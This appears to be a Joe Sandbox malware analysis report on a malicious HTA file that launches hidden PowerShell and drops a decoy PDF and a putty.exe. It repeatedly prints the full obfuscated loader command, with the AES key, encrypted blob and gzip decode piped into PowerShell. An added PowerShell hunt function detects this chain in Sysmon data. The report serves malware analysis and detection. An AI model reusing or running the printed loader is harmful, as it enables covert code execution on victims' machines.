Source: C:\Users\user\putty.exe | Code function: 10_2_0044157E
Source: C:\Users\user\putty.exe | Code function: 10_2_0041F677
Source: C:\Users\user\putty.exe | Code function: 10_2_004206FF
Source: C:\Users\user\putty.exe | Code function: 10_2_0043E753
Source: C:\Users\user\putty.exe | Code function: 10_2_00419759
Source: C:\Users\user\putty.exe | Code function: 10_2_00423875
Source: C:\Users\user\putty.exe | Code function: 10_2_0042C81D
Source: C:\Users\user\putty.exe | Code function: 10_2_0041F9FB
Source: C:\Users\user\putty.exe | Code function: 10_2_0041E995
Source: C:\Users\user\putty.exe | Code function: 10_2_0042A995
Source: C:\Users\user\putty.exe | Code function: 10_2_00420ACB
Source: C:\Users\user\putty.exe | Code function: 10_2_0043BA8E
Source: C:\Users\user\putty.exe | Code function: 10_2_0042DBD0
Source: C:\Users\user\putty.exe | Code function: 10_2_0041EBF7
Source: C:\Users\user\putty.exe | Code function: 10_2_0040AB8E
Source: C:\Users\user\putty.exe | Code function: 10_2_0044CC70
Source: C:\Users\user\putty.exe | Code function: 10_2_00424C79
Source: C:\Users\user\putty.exe | Code function: 10_2_00426CBC
Source: C:\Users\user\putty.exe | Code function: 10_2_00437E1C
Source: C:\Users\user\putty.exe | Code function: 10_2_0041FE9B
Source: C:\Users\user\putty.exe | Code function: 10_2_0041EF75
Source: C:\Users\user\putty.exe | Code function: 10_2_00420F7D
Source: C:\Users\user\putty.exe | Code function: 10_2_00454F3A
Source: C:\Users\user\putty.exe | Code function: String function: 004080C2 appears 68 times
Source: C:\Users\user\putty.exe | Code function: String function: 0040B852 appears 132 times
Source: C:\Users\user\putty.exe | Code function: String function: 00449720 appears 127 times
Source: C:\Users\user\putty.exe | Code function: String function: 0044CD68 appears 33 times
Source: C:\Users\user\putty.exe | Code function: String function: 004116F9 appears 62 times
Source: C:\Users\user\putty.exe | Code function: String function: 0040E8A8 appears 108 times
Source: C:\Users\user\putty.exe | Code function: String function: 00407ACB appears 73 times
Source: C:\Users\user\putty.exe | Code function: String function: 00407D26 appears 32 times
Source: C:\Users\user\putty.exe | Code function: String function: 0044C4D0 appears 63 times
Source: C:\Users\user\putty.exe | Code function: String function: 0044C558 appears 251 times
Source: C:\Users\user\putty.exe | Code function: String function: 0043D0E9 appears 111 times
Source: C:\Users\user\putty.exe | Code function: String function: 00407925 appears 262 times
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Source: Joe Sandbox View | Dropped File: C:\Users\user\putty.exe ABCC2A2D828B1624459CF8C4D2CCDFDCDE62C8D1AB51E438DB200AB3C5C8CD17
Source: a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta | ReversingLabs: Detection: 21%
Source: a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta | Virustotal: Detection: 30%
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $fNaPOP = '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';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - }
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, 
([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell -
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $fNaPOP = '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';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Research.pdf
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2128 --field-trial-handle=1564,i,7959819648417443592,3997577616809760479,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Users\user\putty.exe "C:\Users\user\putty.exe"
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process created: unknown unknown
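The process tree above is the detection opportunity: mshta.exe spawns powershell.exe with -ExecutionPolicy UnRestricted, which hides a cmd.exe that starts a second powershell.exe carrying an inline AES/base64/gzip stage, which in turn pipes the decoded text into "powershell -". The following is an added example, not part of the Joe Sandbox report: a hunt function that walks process-creation records looking for a powershell.exe whose ancestry within three hops includes mshta.exe and whose command line carries the loader's markers. The field names follow Sysmon Event ID 1 (ProcessId, ParentProcessId, Image, CommandLine); the sample records, the marker list, weights and threshold are constructed assumptions.

```powershell
# Added example, not part of the Joe Sandbox report. Field names follow Sysmon
# Event ID 1; records, markers, weights and the threshold are assumptions.

function Find-HtaPowerShellLoader {
    param([Parameter(Mandatory)][object[]]$Events, [int]$MinScore = 3)
    # Substrings lifted from the command line shown in this report.
    $markers = 'AesManaged', 'FromBase64String', 'GzipStream', 'TransformFinalBlock', '| powershell -'
    $byPid = @{}
    foreach ($e in $Events) { $byPid[[int]$e.ProcessId] = $e }
    $hits = foreach ($e in $Events) {
        if ($e.Image -notmatch '\\powershell\.exe$') { continue }
        # Walk up to three ancestors looking for an HTA host; in this report the
        # inner powershell.exe sits two hops below mshta.exe because cmd.exe is in between.
        $ancestor = $byPid[[int]$e.ParentProcessId]; $hops = 0; $viaMshta = $false
        while ($ancestor -and $hops -lt 3) {
            if ($ancestor.Image -match '\\mshta\.exe$') { $viaMshta = $true; break }
            $ancestor = $byPid[[int]$ancestor.ParentProcessId]; $hops++
        }
        if (-not $viaMshta) { continue }
        $score = 0
        foreach ($m in $markers) {
            if ($e.CommandLine.IndexOf($m, [StringComparison]::OrdinalIgnoreCase) -ge 0) { $score++ }
        }
        if ($e.CommandLine -match '-ExecutionPolicy\s+Unrestricted') { $score++ }
        if ($e.CommandLine.Length -gt 1000) { $score++ }   # the report's "very long command line"
        if ($score -ge $MinScore) {
            [pscustomobject]@{
                ProcessId   = $e.ProcessId
                Hops        = $hops
                Score       = $score
                CommandLine = $e.CommandLine.Substring(0, [Math]::Min(80, $e.CommandLine.Length))
            }
        }
    }
    return @($hits)
}

# Constructed records shaped like the process tree in this report (PIDs are made up).
$stagePs = "powershell.exe `$fNaPOP = '" + ('A' * 1100) + "';`$k = New-Object 'System.Security.Cryptography.AesManaged';[System.Convert]::FromBase64String(`$fNaPOP);New-Object System.IO.Compression.GzipStream;TransformFinalBlock"
$events = @(
    [pscustomobject]@{ ProcessId = 100; ParentProcessId = 1;   Image = 'C:\Windows\explorer.exe';                                    CommandLine = 'explorer.exe' }
    [pscustomobject]@{ ProcessId = 200; ParentProcessId = 100; Image = 'C:\Windows\SysWOW64\mshta.exe';                              CommandLine = 'mshta.exe "C:\Users\user\Desktop\sample.hta"' }
    [pscustomobject]@{ ProcessId = 300; ParentProcessId = 200; Image = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell.exe -ExecutionPolicy UnRestricted Start-Process cmd.exe -WindowStyle hidden -ArgumentList {/c ' + $stagePs + ' | powershell - }' }
    [pscustomobject]@{ ProcessId = 400; ParentProcessId = 300; Image = 'C:\Windows\SysWOW64\cmd.exe';                                CommandLine = 'cmd.exe /c ' + $stagePs + ' | powershell -' }
    [pscustomobject]@{ ProcessId = 500; ParentProcessId = 400; Image = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = $stagePs }
    [pscustomobject]@{ ProcessId = 600; ParentProcessId = 100; Image = 'C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe'; CommandLine = 'powershell.exe -NoProfile Get-Process' }
)
# Expected: PIDs 300 (hop 0) and 500 (hop 2) are reported; PID 600 is not under mshta.exe.
Find-HtaPowerShellLoader -Events $events | Format-Table -AutoSize
```

With Sysmon installed, the same function can be fed real records by reading Event ID 1 from the Microsoft-Windows-Sysmon/Operational log with Get-WinEvent and mapping the ProcessId, ParentProcessId, Image and CommandLine event-data fields onto objects of the shape used above. The ancestry walk matters more than any single marker: the decoded stage is only ever visible to AMSI and script block logging, while the mshta.exe parent and the oversized, AES-laden command line are visible at process creation before anything is decrypted.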
Source: C:\Windows\SysWOW64\mshta.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\Research.pdf
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yzagccmo.ije.ps1
Source: classification engine | Classification label: mal92.spyw.evad.winHTA@27/30@1/2
Source: C:\Users\user\putty.exe | Code function: 10_2_00446368 CoCreateInstance
Source: C:\Windows\SysWOW64\mshta.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\putty.exe | Code function: 10_2_00446525 GetLastError,FormatMessageA,GetLastError,_strlen,_strlen
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6088:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5928:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - }@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help users find this module via navigations a
Source: putty.exe | String found in binary or memory: ssh.tunnels.portfwd.ipversion:config-ssh-portfwd-address-family
Source: putty.exe | String found in binary or memory: connection.ipversion:config-address-family
Source: putty.exe | String found in binary or memory: serial.stopbits:config-serial-stopbits
Source: C:\Windows\SysWOW64\mshta.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\putty.exe | Window detected: Number of UI elements: 20
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: a913b6f2499bfbef318b948a278f0e441a5d6334752712d4f4539e72.hta | Static file information: File size 1153504 > 1048576

Data Obfuscation

Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted Start-Process 'cmd.exe' -WindowStyle hidden -ArgumentList {/c powershell.exe $fNaPOP = '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';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, ([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR | powershell - }
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe $fNaPOP = 'AAAAAAAAAAAAAAAAAAAAAPq3+YYuESDCP30fCtt1g8+BllQDeEK2RL0/q2v+83d4BFFpsS5iJU6kFeS1JzaAIIjoFB3qbZ4arUa/P0A2xkjM5iuNW72eqrksKCnteMTJHARvOlHxtFF2Y5wz5P2jTj8qOAbDNBfSmoktklgidKmITv4Lcg8mILUKzUd9s+wKjzqzjTCjO/2G5KR/8OACyCs/NGTKY8euJIFd3JJz5ylYW3oFjpf3MJ9CzN20cb8PHYfovW8CHT0xnVzCfmgO/E8zd5ZqzfWG7smpcDA2ExuZDGAJGu5tHHWB7zEHt3D3piB67d6q7vHJNkGbSIV6zCPOFIP7s25z6l2WgczC+2l0H4WG5atfmshceYxBLkJmL3+4vdT9rw3zEp3Gp2C/Hy8udbeID77xXgK3+QrDNhAlxW7kxAFq6B8jYiFfP3403hxtqvgrEaHvVf8Yj2RvMsbDjplrnScmvGd9IqA7OxvubNuWW9u2M23JiSeSQ4uZ7NhkFBozi8YuXfaIrOonGW7TY7XUD6uPRXjTiAwNNNS2sAQk/oKX7moMS6bGVr3YYH/SG2sq5Kq7RYEJPk4BTIkllKdMILZqNu8d/Xf1CeZAopnM27zbagY2uYzvLziepNimUT6TKFecr+KQcrmydbFCsk/3RbYPdZNEoDmRrJZuEJPSkcyj60Ix9eVqYbKTMtPkyyT4yGrR/6uU6i+3tYlLQXZjJHNnGBzyXVXwMnYs9nzNdpphf2bMYeLnENNqsNg8rs0j4jTd9OzOJo6orWXFY54hD1OMI8Rzby565/grQubRf9KNj3pkkKx5LO7JjjkdA49ARW/YGaIvigRgvZKfqOLkwINuh3agYb/7frzuyKeLCzmwXHR7gPJmxmpop3ScsHlT6P522CVJacLhmbxH8EbVj89KLiG5DnG0o1y0kV3zJ8QKXZcmfiHT+wA0P7c89p9Ihf41CM6quS0cjzqXJH76OPrm8iujlCD9SmMxUkrE8SoPlRjE+s8rbdTv';$mehLaZDc = 'd2Z5WFdPd1VKSXdqYXNCRnhTRWRuSFBtZGJqWlFTSXo=';$PYLEHHT = New-Object 'System.Security.Cryptography.AesManaged';$PYLEHHT.Mode = [System.Security.Cryptography.CipherMode]::ECB;$PYLEHHT.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$PYLEHHT.BlockSize = 128;$PYLEHHT.KeySize = 256;$PYLEHHT.Key = [System.Convert]::FromBase64String($mehLaZDc);$BWoPS = [System.Convert]::FromBase64String($fNaPOP);$MkdtxWXs = $BWoPS[0..15];$PYLEHHT.IV = $MkdtxWXs;$IaLmFBNdk = $PYLEHHT.CreateDecryptor();$MvUYGVuHe = $IaLmFBNdk.TransformFinalBlock($BWoPS, 16, $BWoPS.Length - 16);$PYLEHHT.Dispose();$cxVQsOlZ = New-Object System.IO.MemoryStream( , $MvUYGVuHe );$kPnxbBu = New-Object System.IO.MemoryStream;$uGBpShIzT = New-Object System.IO.Compression.GzipStream $cxVQsOlZ, 
([IO.Compression.CompressionMode]::Decompress);$uGBpShIzT.CopyTo( $kPnxbBu );$uGBpShIzT.Close();$cxVQsOlZ.Close();[byte[]] $bsMmu = $kPnxbBu.ToArray();$FPimSbR = [System.Text.Encoding]::UTF8.GetString($bsMmu);$FPimSbR
